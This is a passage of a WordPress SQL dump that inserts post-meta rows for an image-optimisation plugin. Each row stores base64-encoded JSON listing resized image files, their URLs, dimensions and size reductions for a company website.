9uZmlkZW50aWFsLTM0MHg5MS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jb25maWRlbnRpYWwtMzQweDkxLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTQzMywiaWQiOjM1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NvbmZpZGVudGlhbC0yNTB4OTEuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0Ijo5MSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jb25maWRlbnRpYWwtMjUweDkxLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NvbmZpZGVudGlhbC0yNTB4OTEuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxNDM1LCJpZCI6MzV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY29uZmlkZW50aWFsLTIwMHg5MS5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjkxLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NvbmZpZGVudGlhbC0yMDB4OTEuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY29uZmlkZW50aWFsLTIwMHg5MS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTE0MzgsImlkIjozNX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jb25maWRlbnRpYWwtMjI1eDkxLmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6OTEsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY29uZmlkZW50aWFsLTIyNXg5MS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jb25maWRlbnRpYWwtMjI1eDkxLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTQ0MCwiaWQiOjM1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NvbmZpZGVudGlhbC01MTB4OTEuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo5MSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jb25maWRlbnRpYWwtNTEweDkxLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NvbmZpZGVudGlhbC01MTB4OTEuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxNDQyLCJpZCI6MzV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jb25maWRlbnRpYWwtMTE0eDkxLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NvbmZpZGVudGlhbC0xMTR4OTEuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiI5MSIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jb25maWRlbnRpYWwtMTE0eDkxLmpwZyIsInJlZHVjdGlvbiI6MjU0LCJ0aW1lIjoxNDgzNTkxNDQ0LCJpZCI6MzV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jb25maWRlbnRpYWwtMTgweDkxLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NvbmZpZGVudGlhbC0xODB4OTEuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiI5MSIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jb25maWRlbnRpYWwtMTgweDkxLmpwZyIsInJlZHVjdGlvbiI6MjMxLCJ0aW1lIjoxNDgzNTkxNDQ2LCJpZCI6MzV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jb25maWRlbnRpYWwtMjQ3eDkxLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NvbmZpZGVudGlhbC0yNDd4OTEuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiI5MSIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jb25maWRlbnRpYWwtMjQ3eDkxLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTQ0OCwiaWQiOjM1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY29uZmlkZW50aWFsLTMwMHg5MS5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jb25maWRlbnRpYWwtMzAweDkxLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiOTEiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY29uZmlkZW50aWFsLTMwMHg5MS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTE0NTAsImlkIjozNX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NvbmZpZGVudGlhbC00MDB4OTEuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY29uZmlkZW50aWFsLTQwMHg5MS5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjkxIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NvbmZpZGVudGlhbC00MDB4OTEuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxNDUzLCJpZCI6MzV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jb25maWRlbnRpYWwtNjAweDkxLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NvbmZpZGVudGlhbC02MDB4OTEuanBnIiwid2lkdGgiOiI2MDAiLCJoZWlnaHQiOiI5MSIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jb25maWRlbnRpYWwtNjAweDkxLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTQ1NSwiaWQiOjM1fV0='); 
INSERT INTO `wp_postmeta` VALUES (30427, 34, 'wpfc_optimisation_reduction', '46908'); 
INSERT INTO `wp_postmeta` VALUES (30428, 34, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY29uY2VudHJhdGUuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jb25jZW50cmF0ZS5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1OCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NvbmNlbnRyYXRlLmpwZyIsInJlZHVjdGlvbiI6NDY5MDIsInRpbWUiOjE0ODM1OTE0NjIsImlkIjoiMzQifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NvbmNlbnRyYXRlLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY29uY2VudHJhdGUtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jb25jZW50cmF0ZS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTQ2NCwiaWQiOjM0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NvbmNlbnRyYXRlLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY29uY2VudHJhdGUtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jb25jZW50cmF0ZS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTQ2NiwiaWQiOjM0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NvbmNlbnRyYXRlLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY29uY2VudHJhdGUtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jb25jZW50cmF0ZS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTQ2OCwiaWQiOjM0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY29uY2VudHJhdGUtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jb25jZW50cmF0ZS0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NvbmNlbnRyYXRlLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxNDcwLCJpZCI6MzR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jb25jZW50cmF0ZS0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NvbmNlbnRyYXRlLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY29uY2VudHJhdGUtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTE0NzIsImlkIjozNH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NvbmNlbnRyYXRlLTI0N3gyNTguanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY29uY2VudHJhdGUtMjQ3eDI1OC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjI1OCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jb25jZW50cmF0ZS0yNDd4MjU4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTQ3NCwiaWQiOjM0fV0='); 
INSERT INTO `wp_postmeta` VALUES (30429, 33, 'wpfc_optimisation_reduction', '74686'); 
INSERT INTO `wp_postmeta` VALUES (30430, 33, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY29tcHJlc3NlZGdhcy5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NvbXByZXNzZWRnYXMuanBnIiwid2lkdGgiOjMwMCwiaGVpZ2h0IjozMjgsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jb21wcmVzc2VkZ2FzLmpwZyIsInJlZHVjdGlvbiI6NzQ2NzksInRpbWUiOjE0ODM1OTE0ODEsImlkIjoiMzMifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NvbXByZXNzZWRnYXMtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jb21wcmVzc2VkZ2FzLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY29tcHJlc3NlZGdhcy0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTQ4NCwiaWQiOjMzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NvbXByZXNzZWRnYXMtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jb21wcmVzc2VkZ2FzLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY29tcHJlc3NlZGdhcy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTQ4NiwiaWQiOjMzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NvbXByZXNzZWRnYXMtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jb21wcmVzc2VkZ2FzLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY29tcHJlc3NlZGdhcy0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTQ4OCwiaWQiOjMzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY29tcHJlc3NlZGdhcy0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NvbXByZXNzZWRnYXMtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jb21wcmVzc2VkZ2FzLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxNDkwLCJpZCI6MzN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jb21wcmVzc2VkZ2FzLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY29tcHJlc3NlZGdhcy0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NvbXByZXNzZWRnYXMtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTE0OTIsImlkIjozM30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NvbXByZXNzZWRnYXMtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jb21wcmVzc2VkZ2FzLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY29tcHJlc3NlZGdhcy0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTQ5NCwiaWQiOjMzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY29tcHJlc3NlZGdhcy0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NvbXByZXNzZWRnYXMtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jb21wcmVzc2VkZ2FzLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxNDk2LCJpZCI6MzN9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30431, 32, 'wpfc_optimisation_reduction', '42458'); 
INSERT INTO `wp_postmeta` VALUES (30432, 32, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY29tcG91bmRpbmdfb2lsLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY29tcG91bmRpbmdfb2lsLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjU4LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY29tcG91bmRpbmdfb2lsLmpwZyIsInJlZHVjdGlvbiI6NDI0NTIsInRpbWUiOjE0ODM1OTE1MDMsImlkIjoiMzIifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NvbXBvdW5kaW5nX29pbC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NvbXBvdW5kaW5nX29pbC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NvbXBvdW5kaW5nX29pbC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTUwNSwiaWQiOjMyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NvbXBvdW5kaW5nX29pbC0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1z